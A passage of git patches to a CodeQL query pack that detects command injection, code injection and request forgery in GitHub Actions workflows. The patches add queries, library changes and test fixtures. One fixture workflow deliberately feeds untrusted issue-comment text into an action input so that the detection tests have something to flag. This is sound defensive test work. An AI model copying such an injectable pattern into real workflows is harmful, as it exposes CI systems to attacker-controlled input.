user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql new file mode 100644 index 00000000000..7ad0e98bc49 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -0,0 +1,40 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql new file mode 100644 index 00000000000..5a4bbaca034 --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -0,0 +1,46 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 9e94968e280..1e7414e5ce6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -21,8 +21,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 00000000000..3675597fcd7 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From f251783c26bb89fdf785de543ec08ce09ef55c26 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 0119/1267] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6..9891f786f7c 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d0..5d418ec1816 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 @@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc49..bc2dbffdcdf 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034..2a1e4388d24 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd7..d665a368991 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 46afa9c1f3fc771e0430dd2d0101035d2e208048 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 22:41:01 +0100 Subject: [PATCH 0120/1267] Add new tests --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 6 +++--- ql/src/Security/CWE-078/CommandInjection.ql | 1 + .../Security/CWE-078/CriticalCommandInjection.ql | 1 + ql/src/Security/CWE-094/CodeInjection.ql | 1 + ql/src/Security/CWE-094/CriticalCodeInjection.ql | 1 + ql/src/Security/CWE-918/RequestForgery.ql | 1 + ql/test/library-tests/test.expected | 3 +++ .../CWE-078/.github/workflows/comment_issue.yml | 9 +++++++++ .../Security/CWE-078/CommandInjection.expected | 6 ++++++ .../Security/CWE-078/CommandInjection.qlref | 1 + .../CWE-078/CriticalCommandInjection.expected | 6 ++++++ .../CWE-078/CriticalCommandInjection.qlref | 1 + .../Security/CWE-094/CodeInjection.expected | 14 ++++++++++++++ .../Security/CWE-094/CodeInjection.qlref | 1 + .../CWE-094/CriticalCodeInjection.expected | 14 ++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.qlref | 1 + .../CWE-094/CriticalExpressionInjection.expected | 10 ---------- .../Security/CWE-094/ExpressionInjection.expected | 10 ---------- .../Security/CWE-918/.github/workflows/test.yml | 10 ++++++++++ .../Security/CWE-918/RequestForgery.expected | 6 ++++++ .../Security/CWE-918/RequestForgery.qlref | 1 + 21 files changed, 81 insertions(+), 23 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.expected create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.qlref diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 7e265fb2570..08f8b6b9363 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -86,8 +86,10 @@ predicate externallyDefinedStoreStep( ) } -predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { +predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | + sinkModel(action, version, input, kind) and + uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) @@ -96,8 +98,6 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and - sinkModel(action, version, input, kind) and - uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 9891f786f7c..bdc341e8caf 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 5d418ec1816..dddbd142873 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index bc2dbffdcdf..3bac9cec348 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -15,6 +15,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 2a1e4388d24..64d8a6e4328 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -15,6 +15,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index d665a368991..228c94f383b 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index df8c6ddf9cd..5395fe82453 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -315,6 +315,9 @@ scopes sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | | ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | | dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml new file mode 100644 index 00000000000..4b6888449c0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -0,0 +1,9 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: ruby/setup-ruby@v2 + with: + ruby-version: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected new file mode 100644 index 00000000000..decabad082f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref new file mode 100644 index 00000000000..e38b88f2919 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected new file mode 100644 index 00000000000..8a3d19402b7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref new file mode 100644 index 00000000000..ceb027c8058 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/CriticalCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected new file mode 100644 index 00000000000..4ef832d9d22 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref new file mode 100644 index 00000000000..fe9adbf3b64 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected new file mode 100644 index 00000000000..697cf2a310e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected @@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref new file mode 100644 index 00000000000..05ef02c5094 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index aa9d9ae2fc4..8236c4d7829 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -3,7 +3,6 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -64,15 +63,10 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -201,14 +195,10 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external 